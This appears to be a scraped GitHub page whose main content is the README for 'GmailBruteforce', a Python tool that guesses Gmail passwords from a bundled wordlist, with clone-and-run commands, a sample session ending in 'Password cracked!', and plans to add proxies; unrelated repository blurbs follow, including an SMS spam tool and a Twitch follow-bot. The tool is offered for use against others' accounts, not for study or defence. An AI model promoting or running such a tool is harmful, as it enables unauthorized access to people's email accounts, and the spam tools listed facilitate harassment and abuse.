A script written in python3 for bruteforcing Gmail accounts.

Overview

GmailBruteforce

Made for bruteforcing gmail accounts.

It needs Less Secure Apps setting turned on in order to work.

Installation

For windows

git clone https://github.com/Sarthak2143/GmailBruteforce.git
cd GmailBruteforce/
python3 main.py

For Mac/Linux

git clone https://github.com/Sarthak2143/GmailBruteforce.git
cd GmailBruteforce/
chmod +x main.py
./main.py

Usage

You need a target email address with less secure apps setting turned ON and a wordlist for bruteforcing.

Don't have wordlist?

Don't worry this tool comes with a wordlist file that you can use.

┌──(kali㉿kali)-[~/GmailBruteforce]
└─$ python3 main.py

[?] Enter email adress: [email protected]
[?] Enter wordlist path: wordlist.txt
Starting bruteforcing...

[!] Incorrect password: 123456
[!] Incorrect password: 12345
[!] Incorrect password: 123456789
[!] Incorrect password: password                        
[!] Incorrect password: iloveyou
[!] Incorrect password: princess
[!] Incorrect password: 1234567                         
[!] Incorrect password: 12345678                        
[!] Incorrect password: abc123
[!] Incorrect password: nicole                          
[!] Incorrect password: daniel                         
[!] Incorrect password: babygirl                       
[!] Incorrect password: monkey
[!] Incorrect password: lovely
[!] Incorrect password: jessica
[!] Incorrect password: michael
[!] Incorrect password: ashley
[!] Incorrect password: qwerty
[!] Incorrect password: 111111
[!] Incorrect password: iloveu
[!] Incorrect password: 000000
[!] Incorrect password: michelle
[!] Incorrect password: tigger
[!] Incorrect password: sunshine
[+] Correct password: chocolate
[+] Password cracked!

[*] Script finished!
[*] Time Elapsed: 18 seconds.

You've to specify the gmail address and the wordlist.

Requirements

You need git and python3 need on your system inorder to work.

The script will download essential packages automatically so you don't have to worry much.

MOST IMPORTANTLY

The E-Mail address should be of Gmail and it must have Less secure apps turned ON.

TODO

  • Use proxies for better efficiency.
  • A command line version with flags.
Owner
Shinero
I'm a young computer science nerd that loves to code. Aspiring Cyber Security Engineer. I mostly code in Python.
Shinero
To dynamically change the split direction in I3/Sway so as to split new windows automatically based on the width and height of the focused window

To dynamically change the split direction in I3/Sway so as to split new windows automatically based on the width and height of the focused window Insp

Ritin George 6 Mar 11, 2022
Automatically send commands to send Twitch followers to any Twitch account.

Automatically send commands to send Twitch followers to any Twitch account. You just need to be in a Twitch follow bot Discord server!

Thomas Keig 6 Nov 27, 2022
Dante, my discord bot. Open source project in development and not optimized for other filesystems, install and setup script in development

DanteMode (In private development for ~6 months) Dante, my discord bot. Open source project in development and not optimized for other filesystems, in

2 Nov 05, 2021
Fully automated Chegg Discord bot for "homework help"

cheggbog Fully automated Chegg Discord bot for "homework help". Working Sept 15, 2021 Overview Recently, Chegg has made it extremely difficult to auto

Bryce Hackel 8 Dec 23, 2022
Singer Tap for dbt Artifacts built with the Meltano SDK

tap-dbt-artifacts tap-dbt-artifacts is a Singer tap for dbtArtifacts. Built with the Meltano SDK for Singer Taps.

Prratek Ramchandani 9 Nov 25, 2022
Properly-formatted dynamic timestamps for Discord messages

discord-timestamps discord-timestamps generates properly-formatted dynamic timestamps for Discord messages, with support for Arrow objects. format

Ben Soyka 2 Mar 10, 2022
A discord bot for checking what linked profiles a user has to their Ubisoft account

ubisoft_discord_profiles A Discord bot for checking what linked profiles a user has to their Ubisoft account. This can be setup using an enviromental

Andrei 1 Dec 17, 2021
An API wrapper around Discord API.

NeoCord This project is work in progress not for production use. An asynchronous API wrapper around Discord API written in Python. Features Modern API

Izhar Ahmad 14 Jan 03, 2022
Use GitHub Actions to create a serverless service.

ActionServerless - Use GitHub Actions to create a serverless service ActionServerless is an action to do some computing and then generate a string/JSO

107 Oct 28, 2022
a simple python script that monitors the binance hotwallet and refunds the withdrawal fee to encourage people to withdraw their Nano and help decentralisation

Nano_Binance_Refund_Bot a simple python script that monitors the binance hotwallet and refunds the withdrawal fee to encourage people to withdraw thei

James Coxon 5 Apr 07, 2022
Deep reinforcement learning library built on top of Neural Network Libraries

Deep Reinforcement Learning Library built on top of Neural Network Libraries NNablaRL is a deep reinforcement learning library built on top of Neural

Sony 100 Dec 14, 2022
SpamSMS - SPAM SMS menggunakan api web INDIHOME

SPAM SMS Unlimited SPAM SMS menggunakan api web INDIHOME Cara Install Di Termux

Zuck-Ker 1 Jan 08, 2022
A modern Python client for controlling Wyze devices.

Python Wyze SDK A modern Python client for controlling Wyze devices. Whether you're building a custom app, or integrating into a third-party service l

Shaun Tarves 205 Jan 02, 2023
Update your World of Warcraft AddOns hosted on GitHub

AddOns Update Tool Tool to update World of Warcraft AddOns hosted on GitHub Features Pure Python: only Dulwich and Colorlog Multithreaded tasks Manual

Mr. Alchemist 16 Dec 06, 2022
A delivery protection and notification system

DeliveryProtect This project builds a delivery protection and notification system, based on integration of Arduino Uno and Raspberry Pi 4. The codes a

2 Dec 13, 2021
An open-source Discord bot that alerts your server when it's Funky Monkey Friday!

Funky-Monkey-Friday-Bot An open-source Discord bot that alerts your server when it's Funky Monkey Friday! Add it to your server here! https://discord.

Cole Swinford 0 Nov 10, 2022
The program for obtaining a horoscope in Python using API from rapidapi.com site.

Python horoscope The program allows you to get a horoscope for your zodiac sign and immediately translate it into almost any language. Step 1 The firs

Architect 0 Dec 25, 2021
A file-based quote bot written in Python

Let's Write a Python Quote Bot! This repository will get you started with building a quote bot in Python. It's meant to be used along with the Learnin

1 Jan 19, 2022
Auto Join: A GitHub action script to automatically invite everyone to the organization who comment at the issue page.

Auto Invite To Org By Issue Comment A GitHub action script to automatically invite everyone to the organization who comment at the issue page. What is

Max Base 6 Jun 08, 2022
A Python app to serve Conveyor room requests and run approvals through Slack

✨ CONVEYOR FOR SLACK ✨ This is a friendly little Python app that will allow you to integrate your instance of Conveyor with your Slack workspace. In o

Vivienne 4 Sep 27, 2021